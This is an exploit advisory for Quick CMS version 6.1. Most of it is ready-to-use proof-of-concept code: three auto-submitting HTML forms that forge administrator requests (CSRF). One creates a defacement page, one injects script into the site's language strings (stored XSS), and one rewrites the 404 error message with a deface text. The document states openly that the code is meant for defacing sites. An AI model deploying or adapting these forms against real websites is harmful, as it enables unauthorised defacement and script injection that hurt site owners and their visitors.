Quick CMS version 6.1 suffers from cross site request forgery and cross site scripting vulnerabilities.
8854dace4f9cbaee5314c4c8af2d0f77520ac18d7478291cd4888679dca4041b
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit Title : Quick CMS CSRF/XSS
-# Vendor Homepage: http://opensolution.org
-# Software Link:
-# http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip
-# Version : 6.1
-# Date: 2016-21-01
-# Tested On : Windows 7 / FireFox
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit For Create a Deface Page
-# [Text] Is Your Deface Message
-# Path Of page is : http://target.com/?(X)
-# Exploit Code:
<form name="addpage" method="POST"
action="http://[URL]/admin.php?p=pages-form" />
<input type="hidden" name="sName" value="Title Of Page" />
<input type="hidden" name="sDescriptionFull" value="[Text]" />
<input type="hidden" name="iStatus" value="1" />
<input type="hidden" name="sUrl" value="(X)" />
<input type="hidden" name="iPosition" value="0" />
<input type="hidden" name="iMenu" value="1" />
<input type="hidden" name="iTheme" value="1" />
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('addpage.submit()',1);
</script>
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit for XSS/Csrf :
<form name="xss" method="POST"
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />
<input type="hidden" name="Pages"
value="Pages<script>alert(/xss/)</script>" /> is Your js Code
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('xss.submit()',1);
</script>
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit for Edit Error 404 :
<form name="notfound" method="POST"
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />
<input type="hidden" name="404_error" value="title+of+page" />
<input type="hidden" name="Data_not_found" value="deface+message" />
<input type="hidden" name="sOption" value="save" />
</form>
<script language="javascript">
setTimeout('notfound.submit()',1);
</script>
------------------------------------------
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-# Discovered by : Amir.ght -#-#
#-# Author : Ashiyane Digital Security Team -#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#